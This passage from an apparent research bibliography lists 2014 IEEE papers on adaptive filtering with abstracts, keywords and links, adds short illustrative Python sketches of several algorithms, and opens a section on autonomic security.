    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6846539&isnumber=6846423
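
To make the variable-window idea concrete, here is a minimal sketch, not the authors' algorithm: a pixel flagged as an outlier against a robust median/MAD estimate has its window widened for confirmation, and a confirmed impulse is replaced by an index-distance-weighted mean of inlying neighbors. Window sizes and the threshold k are illustrative assumptions.

import numpy as np

def denoise_range_image(img, base_win=3, max_win=7, k=3.0):
    """Variable-window impulsive-noise removal (illustrative thresholds)."""
    out = img.astype(float).copy()
    H, W = img.shape
    for y in range(H):
        for x in range(W):
            win = base_win
            while win <= max_win:
                r = win // 2
                y0, y1 = max(0, y - r), min(H, y + r + 1)
                x0, x1 = max(0, x - r), min(W, x + r + 1)
                patch = img[y0:y1, x0:x1].astype(float)
                med = np.median(patch)
                mad = 1.4826 * np.median(np.abs(patch - med)) + 1e-9
                if abs(img[y, x] - med) <= k * mad:
                    break                    # inlier: keep the value
                if win < max_win:            # suspected impulse: widen the window
                    win += 2
                    continue
                # confirmed impulse: index-distance-weighted mean of inliers
                ys, xs = np.mgrid[y0:y1, x0:x1]
                dist = np.hypot(ys - y, xs - x)
                good = (np.abs(patch - med) <= k * mad) & (dist > 0)
                if good.any():
                    w = 1.0 / dist[good]
                    out[y, x] = np.sum(w * patch[good]) / np.sum(w)
                break
    return out

noisy = np.full((32, 32), 5.0)
noisy[10, 10] = 80.0                         # a dropout-style impulse
print(denoise_range_image(noisy)[10, 10])    # restored to approximately 5.0
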
  • Weikun Hou; Xianbin Wang; Chouinard, J.-Y.; Refaey, A, "Physical Layer Authentication for Mobile Systems with Time-Varying Carrier Frequency Offsets," Communications, IEEE Transactions on , vol.62, no.5, pp.1658,1667, May 2014. A novel physical layer authentication scheme is proposed in this paper by exploiting the time-varying carrier frequency offset (CFO) associated with each pair of wireless communications devices. In realistic scenarios, radio frequency oscillators in each transmitter-and-receiver pair always present device-dependent biases to the nominal oscillating frequency. The combination of these biases and mobility-induced Doppler shift, characterized as a time-varying CFO, can be used as a radiometric signature for wireless device authentication. In the proposed authentication scheme, the variable CFO values at different communication times are first estimated. Kalman filtering is then employed to predict the current value by tracking the past CFO variation, which is modeled as an autoregressive random process. To achieve the proposed authentication, the current CFO estimate is compared with the Kalman predicted CFO using hypothesis testing to determine whether the signal has followed a consistent CFO pattern. An adaptive CFO variation threshold is derived for device discrimination according to the signal-to-noise ratio and the Kalman prediction error. In addition, a software-defined radio (SDR) based prototype platform has been developed to validate the feasibility of using CFO for authentication. Simulation results further confirm the effectiveness of the proposed scheme in multipath fading channels.
    Keywords: Doppler shift; Kalman filters; fading channels; multipath channels; radio networks; radio receivers; radio transmitters; software radio; telecommunication security; CFO; Doppler shift; Kalman filtering; Kalman prediction error; SDR; mobile systems; multipath fading channels; nominal oscillating frequency; physical layer authentication; prototype platform; radio frequency oscillators; radiometric signature; receiver; signal-to-noise ratio; software defined radio; time varying carrier frequency offsets; transmitter; wireless communications devices; wireless device authentication; Authentication; Doppler shift; Estimation; Kalman filters; Physical layer; Signal to noise ratio; Wireless communication; Kalman filtering; Physical layer authentication; carrier frequency offset (CFO); hypothesis testing (ID#:14-2032)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6804410&isnumber=6816514
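
A scalar Kalman tracker makes the authentication logic tangible. The sketch below, with assumed AR(1) parameters and an arbitrary four-sigma innovation threshold, tracks a slowly drifting CFO and rejects frames whose estimate departs from the predicted pattern, loosely mirroring the paper's hypothesis test.

import numpy as np

rng = np.random.default_rng(0)

# Assumed AR(1) model for the legitimate transmitter's time-varying CFO
a, q, r = 0.98, 1e-5, 1e-4          # AR coefficient, process and measurement noise
cfo, x_hat, p = 0.05, 0.0, 1.0      # true CFO, Kalman estimate and variance

for t in range(300):
    cfo = a * cfo + rng.normal(0, np.sqrt(q))      # legitimate CFO drifts slowly
    z = cfo + rng.normal(0, np.sqrt(r))            # per-frame CFO estimate
    if t >= 250:                                   # an impostor device takes over
        z = 0.2 + rng.normal(0, np.sqrt(r))
    x_pred = a * x_hat                             # Kalman prediction
    p_pred = a * a * p + q
    innovation = z - x_pred
    # hypothesis test: is the observed CFO consistent with the tracked pattern?
    if abs(innovation) > 4.0 * np.sqrt(p_pred + r):
        print(f"frame {t}: authentication rejected (innovation {innovation:+.4f})")
        continue                                   # do not learn from rejected frames
    gain = p_pred / (p_pred + r)                   # Kalman update
    x_hat = x_pred + gain * innovation
    p = (1 - gain) * p_pred
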
  • Huang, T.; Drake, B.; Aalfs, D.; Vidakovic, B., "Nonlinear Adaptive Filtering with Dimension Reduction in the Wavelet Domain," Data Compression Conference (DCC), 2014 , vol., no., pp.408,408, 26-28 March 2014. Recent advances in adaptive filter theory and the hardware for signal acquisition have led to the realization that purely linear algorithms are often not adequate in these domains. Nonlinearities in the input space have become apparent with today's real world problems. Algorithms that process the data must keep pace with the advances in signal acquisition. Recently kernel adaptive (online) filtering algorithms have been proposed that make no assumptions regarding the linearity of the input space. Additionally, advances in wavelet data compression/dimension reduction have also led to new algorithms that are appropriate for producing a hybrid nonlinear filtering framework. In this paper we utilize a combination of wavelet dimension reduction and kernel adaptive filtering. We derive algorithms in which the dimension of the data is reduced by a wavelet transform. We follow this by kernel adaptive filtering algorithms on the reduced-domain data to find the appropriate model parameters demonstrating improved minimization of the mean-squared error (MSE). Another important feature of our methods is that the wavelet filter is also chosen based on the data, on-the-fly. In particular, it is shown that by using a few optimal wavelet coefficients from the constructed wavelet filter for both training and testing data sets as the input to the kernel adaptive filter, convergence to the near optimal learning curve (MSE) results. We demonstrate these algorithms on simulated and a real data set from food processing.
    Keywords: adaptive filters; mean square error methods; wavelet transforms; MSE minimization; kernel adaptive filtering; mean-squared error minimization; nonlinear adaptive filtering; wavelet coefficients; wavelet dimension reduction; wavelet domain; wavelet transform; Adaptive filters; Algorithm design and analysis; Kernel; Training; Wavelet domain; Wavelet transforms; Pollen wavelets; dimension reduction; kernel adaptive filtering; wavelet transform (ID#:14-2033)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6824460&isnumber=6824399
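
The pipeline (wavelet dimension reduction feeding a kernel adaptive filter) can be sketched in a few lines. The example below uses a single Haar level as the dimension reducer and kernel LMS as the adaptive stage; it is a simplified stand-in for the paper's data-driven wavelet selection, and the target function, step size, and kernel width are assumptions.

import numpy as np

rng = np.random.default_rng(1)

def haar_approx(x):
    """One Haar wavelet level: keep the approximation half (8 -> 4 dims).
    In practice the retained coefficient set would be chosen from training data."""
    return (x[0::2] + x[1::2]) / np.sqrt(2)

class KLMS:
    """Kernel least-mean-squares with a Gaussian kernel (no linearity assumed)."""
    def __init__(self, step=0.5, sigma=1.5):
        self.step, self.sigma = step, sigma
        self.centers, self.alphas = [], []

    def _k(self, u, v):
        return np.exp(-np.sum((u - v) ** 2) / (2 * self.sigma ** 2))

    def predict(self, u):
        return sum(a * self._k(u, c) for a, c in zip(self.alphas, self.centers))

    def update(self, u, d):
        e = d - self.predict(u)              # prediction error
        self.centers.append(u)               # grow the kernel dictionary
        self.alphas.append(self.step * e)
        return e

klms, sq_err = KLMS(), []
for _ in range(400):
    x = rng.normal(size=8)
    d = np.sin(x.sum()) + 0.05 * rng.normal()     # nonlinear target
    sq_err.append(klms.update(haar_approx(x), d) ** 2)
print(f"MSE first 50: {np.mean(sq_err[:50]):.3f}  last 50: {np.mean(sq_err[-50:]):.3f}")
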
  • Nikolic, G.; Nikolic, T.; Petrovic, B., "Using Adaptive Filtering In Single-Phase Grid-Connected System," Microelectronics Proceedings - MIEL 2014, 2014 29th International Conference on , vol., no., pp.417,420, 12-14 May 2014. Recently, there has been a pronounced increase of interest in the field of renewable energy. In this area power inverters are crucial building blocks in a segment of energy converters, since they change direct current (DC) to alternating current (AC). Grid-connected power inverters should operate in synchronism with the grid voltage. In this paper, the structure of a power system based on adaptive filtering is described. The main purpose of the adaptive filter is to adapt the output signal of the inverter to the corresponding load and/or grid signal. By involving adaptive filtering, the response time decreases and the quality of power delivered to the load or grid increases. A comparative analysis of power system operation with and without adaptive filtering is given. In addition, the impact of variable load impedance on the quality of delivered power is considered. Results relating to the total harmonic distortion (THD) factor are obtained using Matlab/Simulink software.
    Keywords: adaptive filters; harmonic distortion; invertors; adaptive filtering; alternating current; direct current; energy converters; power delivery; power inverters; renewable energy; response time; single phase grid connected system; total harmonic distortion factor; variable impedance; Adaptive filters; Adaptive systems; Inverters; Least squares approximations; Power harmonic filters; Pulse width modulation (ID#:14-2034)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6842179&isnumber=6842067
  • Zhen Jiang; Shihong Miao; Pei Liu, "A Modified Empirical Mode Decomposition Filtering-Based Adaptive Phasor Estimation Algorithm for Removal of Exponentially Decaying DC Offset," Power Delivery, IEEE Transactions on , vol.29, no.3, pp.1326,1334, June 2014. This paper proposes a modified empirical-mode decomposition (EMD) filtering-based adaptive dynamic phasor estimation algorithm for the removal of exponentially decaying dc offset. The discrete Fourier transform cannot attain an accurate phasor of the fundamental frequency component in digital protective relays under dynamic system fault conditions because the characteristic of the exponentially decaying dc offset is not consistent. EMD is a fully data-driven, not model-based, adaptive filtering procedure for extracting signal components. But the original EMD technique has high computational complexity and requires a large data series. In this paper, a short data series-based EMD filtering procedure is proposed and an optimum hermite polynomial fitting (OHPF) method is used in this modified procedure. The proposed filtering technique has high accuracy and fast convergence, and is well suited to relay applications. This paper illustrates the characteristics of the proposed technique and evaluates its performance by computer-simulated signals, PSCAD/EMTDC-generated signals, and real power system fault signals.
    Keywords: adaptive filters; discrete Fourier transforms; phasor measurement; polynomial approximation; power harmonic filters; power system faults; relays; adaptive dynamic phasor estimation algorithm; adaptive filtering procedure; digital protective relays; discrete Fourier transform; dynamic system fault; exponentially decaying DC offset; fundamental frequency component; modified empirical mode decomposition filtering; optimum hermite polynomial fitting method; real power system fault signals; Algorithm design and analysis; Discrete Fourier transforms; Estimation; Heuristic algorithms; Polynomials; Power system dynamics; Relays; Adaptive filtering; empirical mode decomposition; exponentially decaying dc offset; optimum hermite polynomial fitting; phasor estimation (ID#:14-2035)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6730717&isnumber=6819482
  • Bhotto, M.Z.A; Antoniou, A, "Affine-Projection-Like Adaptive-Filtering Algorithms Using Gradient-Based Step Size," Circuits and Systems I: Regular Papers, IEEE Transactions on , vol.61, no.7, pp.2048,2056, July 2014. A new class of affine-projection-like (APL) adaptive-filtering algorithms is proposed. The new algorithms are obtained by eliminating the constraint of forcing the a posteriori error vector to zero in the affine-projection algorithm proposed by Ozeki and Umeda. In this way, direct or indirect inversion of the input signal matrix is not required and, consequently, the amount of computation required per iteration can be reduced. In addition, as demonstrated by extensive simulation results, the proposed algorithms offer reduced steady-state misalignment in system-identification, channel-equalization, and acoustic-echo-cancelation applications. A mean-square-error analysis of the proposed APL algorithms is also carried out and its accuracy is verified by using simulation results in a system-identification application.
    Keywords: adaptive filters; gradient methods; mean square error methods; a posteriori error vector; acoustic-echo-cancelation applications; affine-projection-like adaptive-filtering algorithms; channel-equalization; gradient-based step size; input signal matrix; mean-square-error analysis; steady-state misalignment; system-identification; Algorithm design and analysis; Computational complexity; Convergence; Least squares approximations; Matrix decomposition; Steady-state; Vectors; Adaptive filters; adaptive-filtering algorithms; affine-projection algorithms; mean-square error in adaptive filtering (ID#:14-2036)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6747407&isnumber=6842725
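
For reference, the classical affine-projection update that the proposed APL algorithms start from is compact enough to sketch. The code below implements the standard Ozeki-Umeda form, including the matrix inversion that the APL variants eliminate, on a toy system-identification problem; filter order, projection order, and step size are illustrative.

import numpy as np

def apa_identify(x, d, order=8, proj=4, mu=0.5, eps=1e-6):
    """Classical affine-projection update (Ozeki-Umeda).  The APL variants
    described above drop the matrix inversion below to cut per-iteration cost."""
    w = np.zeros(order)
    for n in range(proj + order - 1, len(x)):
        # data matrix: the 'proj' most recent input regressors, one per row
        X = np.array([x[n - k - order + 1:n - k + 1][::-1] for k in range(proj)])
        dn = d[n - proj + 1:n + 1][::-1]
        e = dn - X @ w                               # a priori error vector
        w = w + mu * X.T @ np.linalg.solve(X @ X.T + eps * np.eye(proj), e)
    return w

rng = np.random.default_rng(2)
h = rng.normal(size=8)                               # unknown system
x = rng.normal(size=5000)
d = np.convolve(x, h)[:len(x)] + 0.01 * rng.normal(size=len(x))
print(np.round(apa_identify(x, d) - h, 3))           # near-zero misalignment
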
  • Bin Sun; Shutao Li; Jun Sun, "Scanned Image Descreening With Image Redundancy and Adaptive Filtering," Image Processing, IEEE Transactions on , vol.23, no.8, pp.3698,3710, Aug. 2014. Currently, most electrophotographic printers use a halftoning technique to print continuous tone images, so scanned images obtained from such hard copies are usually corrupted by screen-like artifacts. In this paper, a new model of scanned halftone image is proposed to consider both printing distortions and halftone patterns. Based on this model, an adaptive filtering based descreening method is proposed to recover high quality contone images from the scanned images. An image redundancy based denoising algorithm is first adopted to reduce printing noise and attenuate distortions. Then, the screen frequency of the scanned image and local gradient features are used for adaptive filtering. A basic contone estimate is obtained by filtering the denoised scanned image with an anisotropic Gaussian kernel, whose parameters are automatically adjusted with the screen frequency and local gradient information. Finally, an edge-preserving filter is used to further enhance the sharpness of edges to recover a high quality contone image. Experiments on real scanned images demonstrate that the proposed method can recover high quality contone images from the scanned images. Compared with the state-of-the-art methods, the proposed method produces very sharp edges and much cleaner smooth regions.
    Keywords: Gaussian processes; adaptive filters; electrophotography; image denoising; printers; adaptive filtering; anisotropic Gaussian kernel; continuous tone image print; denoising algorithm; edge-preserving filter; electrophotographic printers; halftone pattern; high quality contone image recovery; image redundancy; local gradient features; printing distortion; printing noise reduction; scanned halftone image; scanned image descreening; Image edge detection; Kernel; Noise; Noise reduction; Printers; Printing; Redundancy; Scanned image; adaptive filtering; descreening; inverse halftoning; steerable filter (ID#:14-2037)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6841640&isnumber=6840896
  • Arablouei, R.; Werner, S.; Dogancay, K., "Analysis of the Gradient-Descent Total Least-Squares Adaptive Filtering Algorithm," Signal Processing, IEEE Transactions on , vol.62, no.5, pp.1256,1264, March 1, 2014. The gradient-descent total least-squares (GD-TLS) algorithm is a stochastic-gradient adaptive filtering algorithm that compensates for error in both input and output data. We study the local convergence of the GD-TLS algorithm and find bounds for its step-size that ensure its stability. We also analyze the steady-state performance of the GD-TLS algorithm and calculate its steady-state mean-square deviation. Our steady-state analysis is inspired by the energy-conservation-based approach to the performance analysis of adaptive filters. The results predicted by the analysis show good agreement with the simulation experiments.
    Keywords: adaptive filters; least squares approximations; stochastic processes; energy-conservation; gradient-descent total least-squares algorithm; steady-state analysis; steady-state mean-square deviation; stochastic-gradient adaptive filtering algorithm; Adaptive filters; Algorithm design and analysis; Signal processing algorithms; Stability criteria; Steady-state; Vectors; Adaptive filtering; Rayleigh quotient; mean-square deviation; performance analysis; stability; total least-squares (ID#:14-2038)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6716043&isnumber=6732988
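
The GD-TLS idea admits a compact sketch. Taking the Rayleigh-quotient cost J(w) = (d - w'x)^2 / (1 + ||w||^2) and descending its stochastic gradient gives the update below; this is a toy demonstration under equal input and output noise variances (where TLS is the appropriate estimator), not the paper's analysis, and the step size is an assumption.

import numpy as np

rng = np.random.default_rng(3)
h = np.array([0.7, -0.4, 0.2, 0.1])          # unknown system
mu, w = 0.01, np.zeros(4)

for _ in range(20000):
    x_clean = rng.normal(size=4)
    x = x_clean + 0.1 * rng.normal(size=4)   # noisy INPUT (the TLS setting)
    d = h @ x_clean + 0.1 * rng.normal()     # noisy output
    e = d - w @ x
    v = 1.0 + w @ w                          # Rayleigh-quotient denominator
    # stochastic gradient step on J = e^2 / (1 + ||w||^2)
    w = w + mu * (e * x + (e * e) * w / v) / v

print("estimate:", np.round(w, 3), " true:", h)
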
  • Thu Trang Le; Atto, AM.; Trouve, E.; Nicolas, J.-M., "Adaptive Multitemporal SAR Image Filtering Based on the Change Detection Matrix," Geoscience and Remote Sensing Letters, IEEE , vol.11, no.10, pp.1826,1830, Oct. 2014. This letter presents an adaptive filtering approach for synthetic aperture radar (SAR) image time series based on analysis of the temporal evolution. First, change detection matrices (CDMs) containing information on changed and unchanged pixels are constructed for each spatial position over the time series by implementing coefficient of variation (CV) cross tests. Afterward, the CDM provides, for each pixel in each image, an adaptive spatiotemporal neighborhood, which is used to derive the filtered value. The proposed approach is illustrated on a time series of 25 ascending TerraSAR-X images acquired from November 6, 2009 to September 25, 2011 over the Chamonix-Mont-Blanc test-site, which includes different kinds of change, such as parking occupation, glacier surface evolution, etc.
    Keywords: adaptive filters; matrix algebra; radar detection; radar imaging; synthetic aperture radar; time series; CDM; CV; Chamonix-Mont-Blanc test-site; TerraSAR-X image acquisition; adaptive multitemporal SAR image filtering approach; adaptive spatiotemporal neighborhood; change detection matrix; coefficient of variation; glacier surface evolution; parking occupation; synthetic aperture radar; temporal evolution analysis; time series; Filtering; Indexes; Noise; Remote sensing; Speckle; Synthetic aperture radar; Time series analysis; Change detection; coefficient of variation (CV); synthetic aperture radar (SAR) image time series; temporal adaptive filtering (ID#:14-2039)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6784380&isnumber=6814328
  • Zerguine, A; Hammi, O.; Abdelhafiz, AH.; Helaoui, M.; Ghannouchi, F., "Behavioral modeling and predistortion of nonlinear power amplifiers based on adaptive filtering techniques," Multi-Conference on Systems, Signals & Devices (SSD), 2014 11th International , vol., no., pp.1,5, 11-14 Feb. 2014. In this paper, the use of some of the most popular adaptive filtering algorithms for the purpose of linearizing power amplifiers by the well-known digital predistortion (DPD) technique is investigated. First, an introduction to the problem of power amplifier linearization is given, followed by a discussion of the model used for this purpose. Next, a variety of adaptive algorithms are used to construct the digital predistorter function for a highly nonlinear power amplifier and their performance is comparatively analyzed. Based on the simulations presented in this paper, conclusions regarding the choice of algorithm are derived.
    Keywords: adaptive filters; power amplifiers; DPD technique; adaptive filtering techniques; behavioral modeling; digital predistortion technique; nonlinear power amplifier predistortion; power amplifier linearization; Adaptation models; Wireless communication; Adaptive filtering; behavioral modeling; nonlinear system identification; power amplifier nonlinearities (ID#:14-2040)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6808909&isnumber=6808745
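
A minimal indirect-learning DPD loop shows how an adaptive filter linearizes a PA. The sketch assumes a toy memoryless polynomial PA model and a three-term odd-order predistorter: complex LMS fits a post-inverse from the PA output back to its input, and the fitted function is then copied in front of the PA. The model coefficients and step size are illustrative, not those of the paper.

import numpy as np

rng = np.random.default_rng(4)

def pa(x):
    """Toy memoryless power-amplifier model with odd-order distortion
    (a stand-in, not the behavioural model used in the paper)."""
    return x - 0.15 * x * np.abs(x) ** 2 + 0.02 * x * np.abs(x) ** 4

def basis(x):
    """Odd-order polynomial regressors: x, x|x|^2, x|x|^4."""
    return np.array([x, x * np.abs(x) ** 2, x * np.abs(x) ** 4])

# Indirect learning: LMS fits a post-inverse of the PA from its output back
# to its input, then the fitted function is copied in front of the PA.
w, mu = np.zeros(3, dtype=complex), 0.05
for _ in range(30000):
    x = 0.7 * (rng.normal() + 1j * rng.normal()) / np.sqrt(2)
    u = basis(pa(x))                  # post-inverse sees the PA output
    e = x - np.vdot(w, u)             # error against the PA input
    w += mu * np.conj(e) * u          # complex LMS update

xt = 0.7 * (rng.normal(size=2000) + 1j * rng.normal(size=2000)) / np.sqrt(2)
pre = np.array([np.vdot(w, basis(v)) for v in xt])      # predistorted drive
nmse = lambda y: 10 * np.log10(np.mean(np.abs(y - xt) ** 2) / np.mean(np.abs(xt) ** 2))
print(f"NMSE without DPD: {nmse(pa(xt)):.1f} dB   with DPD: {nmse(pa(pre)):.1f} dB")
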
  • Wei Zhu; Jun Tang; Shuang Wan; Jie-Li Zhu, "Outlier-resistant adaptive filtering based on sparse Bayesian learning," Electronics Letters , vol.50, no.9, pp.663,665, April 24 2014. In adaptive processing applications, the design of the adaptive filter requires estimation of the unknown interference-plus-noise covariance matrix from secondary training data. The presence of outliers in the training data can severely degrade the performance of adaptive processing. By exploiting the sparse prior of the outliers, a Bayesian framework to develop a computationally efficient outlier-resistant adaptive filter based on sparse Bayesian learning (SBL) is proposed. The expectation-maximisation (EM) algorithm is used therein to obtain a maximum a posteriori (MAP) estimate of the interference-plus-noise covariance matrix. Numerical simulations demonstrate the superiority of the proposed method over existing methods.
    Keywords: Bayes methods; adaptive filters; covariance matrices; expectation-maximization algorithm; filtering theory; interference (signal); learning (artificial intelligence); EM algorithm; MAP estimation; SBL; adaptive processing applications; expectation-maximisation algorithm; maximum a posteriori estimation; outlier-resistant adaptive filtering; secondary training data; sparse Bayesian learning; unknown interference-plus-noise covariance matrix estimation (ID#:14-2041)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6809283&isnumber=6809270
  • Shi, L.; Lin, Y., "Convex Combination of Adaptive Filters under the Maximum Correntropy Criterion in Impulsive Interference," Signal Processing Letters, IEEE , vol.21, no.11, pp.1385,1388, Nov. 2014. A robust adaptive filtering algorithm based on the convex combination of two adaptive filters under the maximum correntropy criterion (MCC) is proposed. Compared with conventional minimum mean square error (MSE) criterion-based adaptive filtering algorithms, the MCC-based algorithm shows better robustness against impulsive interference. However, its major drawback is the conflicting requirement between convergence speed and steady-state mean square error. In this letter, we use the convex combination method to overcome this tradeoff. Instead of minimizing the squared error to update the mixing parameter as in the conventional convex combination scheme, the method of maximizing the correntropy is introduced to make the proposed algorithm more robust against impulsive interference. Additionally, we report a novel weight transfer method to further improve tracking performance. Good performance in terms of convergence rate and steady-state mean square error is demonstrated in plant identification scenarios that include impulsive interference and abrupt changes.
    Keywords: adaptive filtering; convex combination; impulsive interference; maximum correntropy criterion; weight transfer (ID#:14-2042)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6857382&isnumber=6848869
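
The mechanism of the letter, two MCC-adapted filters blended by a correntropy-driven mixing parameter, can be sketched as follows. The Gaussian factor exp(-e^2 / 2*sigma^2) gates out impulsive samples in both the component-filter updates and the mixing-parameter update; step sizes, kernel width, and the Cauchy contamination model are assumptions made for illustration.

import numpy as np

rng = np.random.default_rng(5)

def gauss(e, sigma=1.0):
    """Correntropy kernel: near 1 for small errors, near 0 for impulses."""
    return np.exp(-e * e / (2 * sigma * sigma))

h = rng.normal(size=6)                 # unknown plant
w1, w2 = np.zeros(6), np.zeros(6)      # fast and slow component filters
mu1, mu2, mu_a, a = 0.08, 0.008, 2.0, 0.0

for n in range(20000):
    x = rng.normal(size=6)
    noise = rng.normal(0, 0.05)
    if rng.random() < 0.02:            # occasional impulsive interference
        noise += 5 * rng.standard_cauchy()
    d = h @ x + noise
    y1, y2 = w1 @ x, w2 @ x
    lam = 1 / (1 + np.exp(-a))         # mixing parameter in (0, 1)
    y = lam * y1 + (1 - lam) * y2
    e, e1, e2 = d - y, d - y1, d - y2
    # MCC-based updates: the Gaussian factor suppresses impulsive samples
    w1 += mu1 * gauss(e1) * e1 * x
    w2 += mu2 * gauss(e2) * e2 * x
    # mixing parameter adapted by maximising correntropy of the overall error
    a += mu_a * gauss(e) * e * (y1 - y2) * lam * (1 - lam)
    a = np.clip(a, -4, 4)

mis = np.sum((lam * w1 + (1 - lam) * w2 - h) ** 2) / np.sum(h ** 2)
print(f"misalignment: {10 * np.log10(mis):.1f} dB")
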
  • Tong Liu; Xu, Qian; Li, Yuejun, "Adaptive filtering design for in-motion alignment of INS," Control and Decision Conference (2014 CCDC), The 26th Chinese on , vol., no., pp.2669,2674, May 31 2014-June 2 2014. Misalignment angle estimation of a strapdown inertial navigation system (INS) using global positioning system (GPS) data is highly affected by measurement noises, especially noises displaying time-varying statistical properties. Hence, an adaptive filtering approach is recommended for the purpose of improving the accuracy of in-motion alignment. In this paper, a simplified form of Celso's adaptive stochastic filtering is derived and applied to estimate both the INS error states and measurement noise statistics. To detect and bound the influence of outliers in INS/GPS integration, outlier detection based on a jerk tracking model is also proposed. The accuracy and validity of the proposed algorithm are tested through ground-based navigation experiments.
    Keywords: Global Positioning System; Kalman filters; Mathematical model; Noise; Noise measurement; Vehicles; INS/GPS integration; adaptive filtering; in-motion alignment; outlier detection (ID#:14-2043)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6852624&isnumber=6852105
  • Tuia, D.; Munoz-Mari, J.; Rojo-Alvarez, J.L.; Martinez-Ramon, M.; Camps-Valls, G., "Explicit Recursive and Adaptive Filtering in Reproducing Kernel Hilbert Spaces," Neural Networks and Learning Systems, IEEE Transactions on , vol.25, no.7, pp.1413,1419, July 2014. This brief presents a methodology to develop recursive filters in reproducing kernel Hilbert spaces. Unlike previous approaches that exploit the kernel trick on filtered and then mapped samples, we explicitly define the model recursivity in the Hilbert space. For that, we exploit some properties of functional analysis and recursive computation of dot products without the need of preimaging or a training dataset. We illustrate the feasibility of the methodology in the particular case of the g-filter, which is an infinite impulse response filter with controlled stability and memory depth. Different algorithmic formulations emerge from the signal model. Experiments in chaotic and electroencephalographic time series prediction, complex nonlinear system identification, and adaptive antenna array processing demonstrate the potential of the approach for scenarios where recursivity and nonlinearity have to be readily combined.
    Keywords: Hilbert spaces; IIR filters; adaptive filters; recursive filters; stability; time series; adaptive antenna array processing; adaptive filtering; chaotic time series prediction; complex nonlinear system identification; controlled stability; electroencephalographic time series prediction; functional analysis; infinite impulse response filter; kernel Hilbert spaces; memory depth; recursive filtering; Adaptation models; Hilbert space; Kernel; Mathematical model; Time series analysis; Training; Vectors; Adaptive; autoregressive and moving-average; filter; kernel methods; recursive (ID#:14-2044)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6722955&isnumber=6828828
  • Shimauchi, Suehiro; Ohmuro, Hitoshi, "Accurate adaptive filtering in square-root Hann windowed short-time fourier transform domain," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.1305,1309, 4-9 May 2014. A novel short-time Fourier transform (STFT) domain adaptive filtering scheme is proposed that can be easily combined with nonlinear post filters such as residual echo or noise reduction in acoustic echo cancellation. Unlike normal STFT subband adaptive filters, which suffer from aliasing artifacts due to their poor prototype filter, our scheme achieves good accuracy by exploiting the relationship between the linear convolution and the poor prototype filter, i.e., the STFT window function. The effectiveness of our scheme was confirmed through the results of simulations conducted to compare it with conventional methods.
    Keywords: Adaptive filters; acoustic echo cancellation; short-time Fourier transform; square-root Hann window (ID#:14-2045)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6853808&isnumber=6853544
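
To illustrate STFT-domain adaptive filtering with a square-root Hann window, the sketch below runs a one-complex-tap-per-bin NLMS echo canceller. This multiplicative-transfer-function simplification is precisely the aliasing-prone approximation the paper improves on, so treat it as a baseline illustration; frame length, hop size, and step size are assumed.

import numpy as np

rng = np.random.default_rng(6)
N, hop = 256, 128                              # frame length and 50% overlap
win = np.sqrt(np.hanning(N))                   # square-root Hann analysis window

def frames(sig):
    return np.array([np.fft.rfft(win * sig[i:i + N])
                     for i in range(0, len(sig) - N, hop)])

echo_path = rng.normal(size=64) * np.exp(-np.arange(64) / 10)
far = rng.normal(size=40000)                   # far-end signal
mic = np.convolve(far, echo_path)[:len(far)]   # echo picked up at the microphone

X, D = frames(far), frames(mic)
W = np.zeros(X.shape[1], dtype=complex)        # one complex tap per frequency bin
mu, eps, erle = 0.5, 1e-8, []
for x_f, d_f in zip(X, D):
    e_f = d_f - W * x_f                                       # per-bin error
    W += mu * np.conj(x_f) * e_f / (np.abs(x_f) ** 2 + eps)   # per-bin NLMS
    erle.append(np.sum(np.abs(d_f) ** 2) / (np.sum(np.abs(e_f) ** 2) + eps))
print(f"ERLE over the last frames: {10 * np.log10(np.mean(erle[-50:])):.1f} dB")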

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Autonomic Security

Autonomic Security


Autonomic computing refers to the self-management of complex distributed computing resources that can adapt to unpredictable changes with transparency to operators and users. Security is one of the four key elements of autonomic computing and includes proactive identification of and protection from arbitrary attacks. The articles cited here describe research into the security problems associated with a variety of autonomic systems and were published in the first half of 2014. Topics include autonomic security regarding vulnerability assessments, intelligent sensors, encryption, services, and the Internet of Things.

  • Barrere, M.; Badonnel, R.; Festor, O., "Vulnerability Assessment in Autonomic Networks and Services: A Survey," Communications Surveys & Tutorials, IEEE , vol.16, no.2, pp.988,1004, Second Quarter 2014. Autonomic networks and services are exposed to a large variety of security risks. The vulnerability management process plays a crucial role for ensuring their safe configurations and preventing security attacks. We focus in this survey on the assessment of vulnerabilities in autonomic environments. In particular, we analyze current methods and techniques contributing to the discovery, the description and the detection of these vulnerabilities. We also point out important challenges that should be faced in order to fully integrate this process into the autonomic management plane.
    Keywords: computer network security; fault tolerant computing; autonomic management plane; autonomic networks; autonomic services; security attacks; security risks; vulnerability assessment; vulnerability management process; Autonomic systems; Business; Complexity theory; Computers; Monitoring; Security; Vulnerability assessment; autonomic computing; computer security; vulnerability management (ID#:14-2046)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6587997&isnumber=6811383
